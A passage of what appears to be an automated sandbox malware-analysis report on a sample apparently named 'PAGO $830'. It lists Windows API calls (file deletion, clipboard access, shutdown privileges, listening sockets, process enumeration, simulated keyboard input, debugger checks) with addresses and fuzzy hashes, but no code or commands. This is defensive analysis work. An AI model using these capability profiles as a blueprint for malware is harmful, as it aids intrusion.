                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD12B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD155
                                                            • Part of subcall function 00DDD1BA: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DDD13A,?,?), ref: 00DDD1D0
                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00DDD171
                                                          • FindClose.KERNEL32(00000000), ref: 00DDD182
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 1946585618-1173974218
                                                          • Opcode ID: 7a50af527ac217bc72cb0d92178453cf34679489ebc632c578a760bd0484ebf3
                                                          • Instruction ID: 47e6a249cd863e8759dc1f475c3dca83ac66750cc2dae15d4508c613cddf28f8
                                                          • Opcode Fuzzy Hash: 7a50af527ac217bc72cb0d92178453cf34679489ebc632c578a760bd0484ebf3
                                                          • Instruction Fuzzy Hash: 1E615D3180124DAECF05EBE0DA529EDBBB6EF15304F648166E405772A2EB716F09CB71
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: dd6eed0f11528a18edbccafe237a1dd6bf44b618c8429c9ea8025be9a64302ad
                                                          • Instruction ID: c04cb30633599359ef38f2f54f96f86dcfe4c805afd7db075636bb6c02501049
                                                          • Opcode Fuzzy Hash: dd6eed0f11528a18edbccafe237a1dd6bf44b618c8429c9ea8025be9a64302ad
                                                          • Instruction Fuzzy Hash: 1741C235604641EFD720DF16E888F197BE1EF44318F28C599E4698B762D772EC86CBA0
                                                          APIs
                                                            • Part of subcall function 00DD1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
                                                            • Part of subcall function 00DD1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
                                                            • Part of subcall function 00DD1607: GetLastError.KERNEL32 ref: 00DD168E
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00DDE850
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $ $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-3163812486
                                                          • Opcode ID: 8b6fdbe051724df92090f5098c0ddbb32c079297f7f38a58fd8377076ddc1772
                                                          • Instruction ID: b5499e681914d2e8b2a1b7bf1eb2043c40d77051471fe544bdcae4f2e5396b99
                                                          • Opcode Fuzzy Hash: 8b6fdbe051724df92090f5098c0ddbb32c079297f7f38a58fd8377076ddc1772
                                                          • Instruction Fuzzy Hash: 3601A2766503217AE72432B4AC89BBE775CDB54341F294622FD42E62D1C5619C44A1B0
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DF119D
                                                          • WSAGetLastError.WSOCK32 ref: 00DF11AA
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00DF11E1
                                                          • WSAGetLastError.WSOCK32 ref: 00DF11EC
                                                          • closesocket.WSOCK32(00000000), ref: 00DF121B
                                                          • listen.WSOCK32(00000000,00000005), ref: 00DF122A
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1234
                                                          • closesocket.WSOCK32(00000000), ref: 00DF1263
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                          • String ID:
                                                          • API String ID: 540024437-0
                                                          • Opcode ID: cd337d508590627b20e33af8c063c0bbfb71ce6edeb593ca356a987e0c613495
                                                          • Instruction ID: d90c5473b6e774c21f1d603945f996a2d48eb8baa09de9fb73946f9d14da4911
                                                          • Opcode Fuzzy Hash: cd337d508590627b20e33af8c063c0bbfb71ce6edeb593ca356a987e0c613495
                                                          • Instruction Fuzzy Hash: D8419E34A00204DFD714DF64C489B2ABBE5AF46318F29C198E95A9F292C771EC85CBF1
                                                          APIs
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                            • Part of subcall function 00DDE0B7: GetFileAttributesW.KERNEL32(?,00DDCEB3), ref: 00DDE0B8
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DDD33E
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD38E
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD39F
                                                          • FindClose.KERNEL32(00000000), ref: 00DDD3B6
                                                          • FindClose.KERNEL32(00000000), ref: 00DDD3BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: d7f07cdc9051e6fb1c4273909a77e38002350385b143ef1526306d26654c9f10
                                                          • Instruction ID: dc71aae6b0abb92d2a64e6e9a38c563eb9f8f94b5d700cd1fc6700694760c9d6
                                                          • Opcode Fuzzy Hash: d7f07cdc9051e6fb1c4273909a77e38002350385b143ef1526306d26654c9f10
                                                          • Instruction Fuzzy Hash: AE3182310093459FC700EFA4D8558AF77E8AF95310F448A1EF8D9921A2FB61E909CB73
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: b420277ba2648c3d9ab8859ab2c477aca20d99c11c245a833404ca1a4611e073
                                                          • Instruction ID: 9006b4121acd1e2b153f49aba03350694caa5b23dc0c67b1b9ecad22a10c082f
                                                          • Opcode Fuzzy Hash: b420277ba2648c3d9ab8859ab2c477aca20d99c11c245a833404ca1a4611e073
                                                          • Instruction Fuzzy Hash: 41C23772E096288FDB25CF68DD407EAB7B5EB85305F1841EAD44DE7240E774AE818F60
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DE63FA
                                                          • CoInitialize.OLE32(00000000), ref: 00DE6557
                                                          • CoCreateInstance.OLE32(00E0FD14,00000000,00000001,00E0FB84,?), ref: 00DE656E
                                                          • CoUninitialize.OLE32 ref: 00DE67F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 886957087-24824748
                                                          • Opcode ID: 8e59195f31f4067a95271ea3ee942a5e63740a3ab6eb2eeda58b1648435aec1b
                                                          • Instruction ID: d47de79d8710bb9ef6d3bb04ad0f8baeeb6cd4234616da5e2a3bfc479130613b
                                                          • Opcode Fuzzy Hash: 8e59195f31f4067a95271ea3ee942a5e63740a3ab6eb2eeda58b1648435aec1b
                                                          • Instruction Fuzzy Hash: 0BD15B71608341AFC314EF25C881E6BB7E8FF94744F44896DF5998B291EB70E905CBA2
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DE9A96
                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE9BA9
                                                            • Part of subcall function 00DE3792: GetInputState.USER32 ref: 00DE37E9
                                                            • Part of subcall function 00DE3792: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3884
                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE9AC6
                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE9B93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                          • String ID: *.*
                                                          • API String ID: 1972594611-438819550
                                                          • Opcode ID: fba1adeece8767fce16b0bccc2735ebeaa694c2ffd81176d9ef3c7cad96006d9
                                                          • Instruction ID: 623108ac5d566c4e15ac001435c7dd58e7c9c6a9b1bcb569783f1f4522010600
                                                          • Opcode Fuzzy Hash: fba1adeece8767fce16b0bccc2735ebeaa694c2ffd81176d9ef3c7cad96006d9
                                                          • Instruction Fuzzy Hash: 37416071901249AFCF10EFA5DC99AEEBBB4EF05310F244156E809B2191E7719E84CF70
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D8AECE
                                                          • GetSysColor.USER32(0000000F), ref: 00D8AFA3
                                                          • SetBkColor.GDI32(?,00000000), ref: 00D8AFB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Color$LongProcWindow
                                                          • String ID:
                                                          • API String ID: 3131106179-0
                                                          • Opcode ID: 68370bcb8e50147edb97fcdac5798db8c813eb728f91e12c12bab21b6e189e21
                                                          • Instruction ID: 37e4403c33fd20c6952ae01439a09edf2b1443fc25581c7c9d6eb040036350fa
                                                          • Opcode Fuzzy Hash: 68370bcb8e50147edb97fcdac5798db8c813eb728f91e12c12bab21b6e189e21
                                                          • Instruction Fuzzy Hash: 1FA1E5B0205505BEF629BA2D8C88E7F269DDF83340F19050EF642D7192CA25DD86E373
                                                          APIs
                                                            • Part of subcall function 00DF2F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF2FA1
                                                            • Part of subcall function 00DF2F75: _wcslen.LIBCMT ref: 00DF2FC2
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DF1784
                                                          • WSAGetLastError.WSOCK32 ref: 00DF17AB
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00DF1802
                                                          • WSAGetLastError.WSOCK32 ref: 00DF180D
                                                          • closesocket.WSOCK32(00000000), ref: 00DF183C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 1601658205-0
                                                          • Opcode ID: f27ce79ec9463471c0bd67103a35e8802949eccf0113176773b064fa517f4808
                                                          • Instruction ID: 4b74cf8aad840305cca71ad749f450c132edbd032993524ea21096baa45ab66b
                                                          • Opcode Fuzzy Hash: f27ce79ec9463471c0bd67103a35e8802949eccf0113176773b064fa517f4808
                                                          • Instruction Fuzzy Hash: 8E51B275A00204AFDB10AF24C886F2A77E5EB48718F18C098F9199F3C3DB71AD418BB1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: b4c73e185c094b9b97b3f52c7499ffd4e7d8ae611f9ed9e93313318fafc8aff0
                                                          • Instruction ID: 2924e5f0bb406d6d391b5fc146500ab5ca901b97c219e7764c94a4b72c337356
                                                          • Opcode Fuzzy Hash: b4c73e185c094b9b97b3f52c7499ffd4e7d8ae611f9ed9e93313318fafc8aff0
                                                          • Instruction Fuzzy Hash: 9021E5317402108FE7248F26C894B5ABBE5EF95318F1990ACE449AF281DB72DCC1CBA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-1546025612
                                                          • Opcode ID: 9de1b09c5ad5c46682d1f9e4e568b3d20023e39fd7b1d06d699d68db53881f64
                                                          • Instruction ID: 5a6df94b6437b584ce450a2ceb778a8a840282bfcab2f1cdebe8e06c6879dead
                                                          • Opcode Fuzzy Hash: 9de1b09c5ad5c46682d1f9e4e568b3d20023e39fd7b1d06d699d68db53881f64
                                                          • Instruction Fuzzy Hash: 35A25D75A0021ACBDF24CF58C9507EDB7B1BF54314F2881AAE85AA7284E774DD81CFA1
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00DFA5D3
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00DFA5E1
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00DFA6C3
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFA6D2
                                                            • Part of subcall function 00D8D5DC: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DB4062,?), ref: 00D8D606
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                          • String ID:
                                                          • API String ID: 1991900642-0
                                                          • Opcode ID: b74df25e3df35adc25d3ad19aa6dc31c4a787153a67427d70481ee356d2457b9
                                                          • Instruction ID: 981b937cdc1c04554c6a23580af88cf00aedd3eb0100c6aa266ae777ce5e0225
                                                          • Opcode Fuzzy Hash: b74df25e3df35adc25d3ad19aa6dc31c4a787153a67427d70481ee356d2457b9
                                                          • Instruction Fuzzy Hash: 09513D715083009FD710EF25C886A6BBBE8FF89754F40892DF99997252EB70D905CBB2
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DDA9CA
                                                          • SetKeyboardState.USER32(00000080), ref: 00DDA9E6
                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DDAA54
                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DDAAA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                                          • Instruction ID: de03945c05109190cb0d1258bda99bc9a9f33b6eb89dc73ff0752e142af5eb61
                                                          • Opcode Fuzzy Hash: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                                          • Instruction Fuzzy Hash: 2A311630A40258AEFF308B6989057FE7BA9AB44310F18A31BE481663D1D376CE85C776
                                                          APIs
                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00DECDA7
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00DECE08
                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 00DECE1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorEventFileInternetLastRead
                                                          • String ID:
                                                          • API String ID: 234945975-0
                                                          • Opcode ID: c71f69e51ad138349aee8a6f19d8e86ffeaeef8705aec6872d8cf8cd36e360a3
                                                          • Instruction ID: 9dbcafb0654d2e99b328f912100de203138f0406c04308df86270528698f7fb4
                                                          • Opcode Fuzzy Hash: c71f69e51ad138349aee8a6f19d8e86ffeaeef8705aec6872d8cf8cd36e360a3
                                                          • Instruction Fuzzy Hash: 3221B071510744AFDB30EF66C849B9BBBFCEB40714F24442AE546A2151E771EA46CBB0
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD8200
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: 801eab8c5657115f93aa3b433bba74c93a4d94f11ba3add0d11f7082d93bcf15
                                                          • Instruction ID: 346813230001c810a4274bf441cd3100a922565f41f4b62da6a45a6a329537ae
                                                          • Opcode Fuzzy Hash: 801eab8c5657115f93aa3b433bba74c93a4d94f11ba3add0d11f7082d93bcf15
                                                          • Instruction Fuzzy Hash: 89324774A00B059FCB29CF59C481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941CB64
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DE5BDF
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DE5C35
                                                          • FindClose.KERNEL32(?), ref: 00DE5C7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: 41563130f4d45dba58e4e02f2535e9296e88cbf4b6e0e4c091b0a10550bfeab7
                                                          • Instruction ID: 901938ee902cb833da197312c22991e3b4b2997355fdcc2a6d72845b6b2205e2
                                                          • Opcode Fuzzy Hash: 41563130f4d45dba58e4e02f2535e9296e88cbf4b6e0e4c091b0a10550bfeab7
                                                          • Instruction Fuzzy Hash: C2519B34600B019FC704EF29D490A5AB7E4FF49318F24855DE9AA8B3A2DB31E944CBA1
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00DA26AA
